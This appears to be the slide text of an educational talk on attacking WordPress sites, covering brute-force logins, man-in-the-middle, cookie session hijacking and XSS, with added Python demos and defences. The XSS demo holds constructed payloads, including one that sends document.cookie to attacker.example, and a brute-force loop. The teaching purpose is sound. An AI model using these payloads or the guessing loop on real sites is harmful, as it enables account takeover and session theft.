Hacking WordPress
A crash course in Web Application hacking.
Disclaimer
This information is given for strictly educational purposes only. It is not cool (and is illegal) to hack sites that you don't own or control. All the sites we'll hack tonight have been set up specifically for the purpose of hacking and contain no sensitive data.
Disclaimer #2
We will be conducting most of our tests in real time. We've tested them extensively, but at any moment something may go wrong. We apologize in advance.
OWASP Top 10
Tonight We’ll Do:
• Brute Force Password Attacking
• Man-In-The-Middle Attacks
• Session Hijacking (via cookie jacking)
• XSS
Brute Force Attacks
A brute-force attack tries candidate passwords one after another until one works. It comes in two flavours: offline cracking, where the attacker already holds a cryptographic hash of the password and checks guesses against it at full speed, and online guessing, where every guess is submitted to the live login form. Tonight's demo is the online kind: each guess is a POST to the site's login page.
Brute Forcing WordPress
• WordPress core has no built-in brute-force defense: it neither limits nor slows down failed logins
• Plugins can add login-attempt limiting and reduce the risk of a brute-force attack
• We'll be brute forcing WordPress using WPScan
Preventing Brute Force Attacks
• Use strong passwords (and encourage your users to do the same)
• Use unique passwords (a breach of one site must not unlock another)
• Limit login attempts per user and per IP, with a lockout and an email-based reset for the locked-out user
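The two slides above describe an online guessing attack and the login-attempt limiter that WordPress core lacks. The following is an added example, written for this page rather than taken from the talk or from WordPress: a stand-in login check (salted SHA-256 instead of WordPress's real password hashing), a constructed wordlist and user table, a per-user/per-IP limiter with an injectable clock, and the attacker loop run once without and once with the limiter. All names, passwords and IPs are constructed for the demo.

```python
"""Online password guessing against a WordPress-style login, shown with and
without a login-attempt limiter.  Added example, not the talk's or WordPress's
code; login function, wordlist, users and IPs are constructed stand-ins."""
import hashlib
import hmac
import time
from collections import defaultdict

# Constructed wordlist (stand-in for the lists WPScan feeds to the login form).
WORDLIST = ["123456", "password", "wordpress", "admin", "letmein", "Tr0ub4dor&3"]

# Constructed user table. Salted SHA-256 stands in for WordPress's real hashing;
# the point is the guessing loop, not the hash.
_SALT = b"demo-salt"


def _hash(pw: str) -> str:
    return hashlib.sha256(_SALT + pw.encode()).hexdigest()


USERS = {
    "admin": _hash("letmein"),                       # weak: in the wordlist
    "editor": _hash("correct horse battery staple"),  # strong: not in the wordlist
}


def check_password(user: str, guess: str) -> bool:
    """What the login endpoint does with each POST: compare against the stored hash."""
    stored = USERS.get(user)
    if stored is None:
        return False
    return hmac.compare_digest(stored, _hash(guess))


class LoginLimiter:
    """Failed-attempt counter keyed by user AND by source IP, with a lockout window.
    WordPress core ships nothing like this; plugins add it.  The clock is
    injectable so the example runs instantly and deterministically."""

    def __init__(self, max_failures=5, window=900, lockout=900, clock=time.time):
        self.max_failures = max_failures
        self.window = window        # seconds over which failures are counted
        self.lockout = lockout      # seconds a key stays locked
        self.clock = clock
        self.failures = defaultdict(list)   # key -> timestamps of recent failures
        self.locked_until = {}              # key -> unix time the lock expires

    @staticmethod
    def _keys(user, ip):
        return (("user", user), ("ip", ip))

    def is_locked(self, user, ip) -> bool:
        now = self.clock()
        return any(self.locked_until.get(k, 0) > now for k in self._keys(user, ip))

    def record_failure(self, user, ip):
        now = self.clock()
        for k in self._keys(user, ip):
            recent = [t for t in self.failures[k] if now - t < self.window]
            recent.append(now)
            self.failures[k] = recent
            if len(recent) >= self.max_failures:
                self.locked_until[k] = now + self.lockout
                self.failures[k] = []

    def record_success(self, user, ip):
        for k in self._keys(user, ip):
            self.failures.pop(k, None)


def login(user, password, ip, limiter=None):
    """Login endpoint. Returns 'ok', 'bad' or 'locked'."""
    if limiter and limiter.is_locked(user, ip):
        return "locked"
    if check_password(user, password):
        if limiter:
            limiter.record_success(user, ip)
        return "ok"
    if limiter:
        limiter.record_failure(user, ip)
    return "bad"


def brute_force(user, ip, limiter=None):
    """Attacker loop: try every word, stop on success or lockout.
    Returns (found_password_or_None, attempts_made, locked_out)."""
    attempts = 0
    for guess in WORDLIST:
        attempts += 1
        result = login(user, guess, ip, limiter)
        if result == "ok":
            return guess, attempts, False
        if result == "locked":
            return None, attempts, True
    return None, attempts, False


if __name__ == "__main__":
    print("no limiter:  ", brute_force("admin", "203.0.113.7"))
    print("with limiter:", brute_force("admin", "203.0.113.7", LoginLimiter(max_failures=3)))
    print("strong pw:   ", brute_force("editor", "203.0.113.7"))
```

Two things the loop makes visible. Without a limiter, the weak password falls on the fifth guess and nothing but the password's strength stood in the way. With one, the attacker is cut off after a handful of failures, but note the trade-off the slide's "email reset" addresses: a per-user lockout lets anyone lock the real admin out by guessing wrong on purpose, so the legitimate user needs an out-of-band way back in.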
Let’s Demonstrate
What is a Man-in-the-Middle Attack?
User Makes Request
Server Sends Response
Attacker can intercept and *change* communication
Let’s Demonstrate
How can someone get "in the middle"?
• Wi-Fi sniffing / a WiFi Pineapple rogue access point
• Network administrators
• ISPs / governments
• Datacenters
Session Hijacking
Session hijacking is a method of taking over a web user's session by surreptitiously obtaining the session ID and masquerading as the authorized user. (It is distinct from TCP session hijacking, which attacks the transport connection itself; here the target is the application's session cookie.)
HTTP is a stateless protocol.
That means the server remembers nothing between requests, so every request has to carry proof of who is making it.
We do this using cookies:
Session Hijacking
User authenticates with username and password
Once verified, server sends authentication cookie to user
On all future requests, user sends the cookie to ensure that they are
authenticated
If we can steal this cookie,
we can become the user.
Let’s Demonstrate
Preventing Man-in-the-Middle and Session Hijacking
• Use HTTPS site wide!!!! (not just on the login page: the cookie travels with every request)
• Set cookies to "HttpOnly" (JavaScript in the page cannot read them, so XSS cannot exfiltrate them)
• Set cookies to "Secure" (the browser never sends them over plain HTTP, so a sniffer never sees them)
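The three bullets above are rules the browser enforces, and a practitioner's first check on a site is whether the login cookie actually carries those attributes. The following is an added example, not code from the talk or from WordPress: it parses Set-Cookie headers, models the two browser rules (Secure cookies only go out over https, HttpOnly cookies are invisible to document.cookie), and audits a weak header against a hardened one. The cookie name follows WordPress's wordpress_logged_in_ prefix, but the value and hash suffix are constructed.

```python
"""How a browser treats the Secure and HttpOnly attributes, plus an audit of
Set-Cookie headers.  Added example for this page; the headers are constructed
(WordPress uses a wordpress_logged_in_<hash> cookie, the value here is made up)."""
from dataclasses import dataclass


@dataclass
class Cookie:
    name: str
    value: str
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Split a Set-Cookie header value into name/value and the flags we care about.
    Attribute names are case-insensitive per RFC 6265, hence the lower()."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return Cookie(name.strip(), value, "secure" in attrs, "httponly" in attrs)


def sent_on_request(cookie: Cookie, scheme: str) -> bool:
    """Browser rule: a Secure cookie is attached only to https:// requests.
    Without Secure it rides along on plain http too, where anyone in the
    middle (the Wi-Fi sniffer from the earlier slide) reads it."""
    return scheme == "https" or not cookie.secure


def readable_by_script(cookie: Cookie) -> bool:
    """Browser rule: HttpOnly cookies are hidden from document.cookie, so an
    XSS payload cannot post them to the attacker."""
    return not cookie.httponly


def audit(header: str) -> list:
    """Return one finding per missing protection; an empty list means both flags are set."""
    c = parse_set_cookie(header)
    findings = []
    if not c.secure:
        findings.append(f"{c.name}: missing Secure; sent over plain HTTP, exposed to MITM")
    if not c.httponly:
        findings.append(f"{c.name}: missing HttpOnly; readable via document.cookie after XSS")
    return findings


# Constructed headers: the same session cookie as an unprotected site would set it,
# and as a hardened site should set it.
WEAK = "wordpress_logged_in_abc=admin%7C1700000000%7Cdeadbeef; Path=/"
HARDENED = "wordpress_logged_in_abc=admin%7C1700000000%7Cdeadbeef; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    for label, header in (("weak", WEAK), ("hardened", HARDENED)):
        c = parse_set_cookie(header)
        print(label, "| seen by http sniffer:", sent_on_request(c, "http"),
              "| stealable by XSS:", readable_by_script(c), "|", audit(header) or "ok")
```

Two caveats the model makes obvious. Secure only helps if the site is also served over HTTPS everywhere, otherwise the browser simply never sends the cookie and the user is logged out on every http:// page. And HttpOnly stops the cookie from being read, not from being used: script injected by XSS still runs inside the logged-in page and can make requests as the victim, which is why the XSS slides list "trick the user into taking an action" alongside "steal cookies".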
XSS Attack
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users.
XSS Attacks
• The attacker injects a small snippet of malicious JavaScript that runs in the victim's browser, with the victim's cookies and session
• Attacks allow us to:
• Steal cookies
• Log keypresses
• Trick the user into taking an action
Let’s Demonstrate
Protecting From XSS
• Developer:
• Validate and sanitize all inputs (use a LIBRARY!!!)
• Encode all outputs for the context they land in (HTML text, attribute, URL)
• User:
• Browsers provide some level of protection
• Be skeptical of anything that asks you to enter information
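The "sanitize inputs, sanitize outputs" bullets are easiest to see with a concrete bug beside its fix. The following is an added example, not code from the talk or from WordPress: a comment renderer that concatenates user data straight into HTML, the same renderer with output encoding and a URL scheme allowlist, and two constructed payloads (one for the text context, one that breaks out of a quoted attribute). The attacker host and the crude contains_script() check exist only for the demo.

```python
"""A comment renderer with an XSS bug beside the encoded version.
Added example for this page; templates, payloads and the attacker host are constructed."""
import html

# Constructed payloads an attacker might submit as a comment author name.
BODY_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_unsafe(author: str, url: str) -> str:
    """String concatenation straight into HTML: whatever the user typed becomes markup.
    BODY_PAYLOAD becomes a live <script>; ATTR_PAYLOAD closes the title attribute
    and adds an event handler; a javascript: URL becomes a clickable payload."""
    return f'<a href="{url}" title="{author}">{author}</a>'


def render_safe(author: str, url: str) -> str:
    """Encode on output, for the context.  html.escape(quote=True) is the library
    call for both the text node and the double-quoted attribute (it turns < > & " '
    into entities).  The href is a URL context, where escaping cannot stop
    javascript: links, so the scheme is allowlisted instead."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    a = html.escape(author, quote=True)
    u = html.escape(url, quote=True)
    return f'<a href="{u}" title="{a}">{a}</a>'


def contains_script(markup: str) -> bool:
    """Crude demo check: does the rendered HTML contain an executable tag, a
    handler attribute, or a javascript: link?  Real testing uses a browser."""
    low = markup.lower()
    return "<script" in low or 'onmouseover="' in low or 'href="javascript:' in low


if __name__ == "__main__":
    for author, url in ((BODY_PAYLOAD, "https://example.com"),
                        (ATTR_PAYLOAD, "https://example.com"),
                        ("alice", "javascript:alert(document.cookie)")):
        print("unsafe:", contains_script(render_unsafe(author, url)),
              "| safe:", contains_script(render_safe(author, url)))
        print("  ", render_safe(author, url))
```

The encoding is context-specific, which is the point the "use a LIBRARY" bullet is making: the same entity escaping that is correct for an HTML text node or a quoted attribute does nothing for a URL and is wrong inside a `<script>` block. Where users are allowed to submit some HTML (as WordPress comments are), escaping everything is not an option and an allowlist sanitizer such as WordPress's own wp_kses() is the library to reach for rather than hand-written filtering.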
Tools
• BeEF - http://beefproject.com/
• WPScan - http://wpscan.org/
• Burp Suite - https://portswigger.net/burp/
• EditThisCookie (Chrome) - https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en
Further Reading
• Troy Hunt - http://www.troyhunt.com/
• Brian Krebs - http://krebsonsecurity.com/
• Courses:
• Troy's courses on Pluralsight - https://www.pluralsight.com/authors/troy-hunt
• One Month Web Security - https://onemonth.com/courses/web-security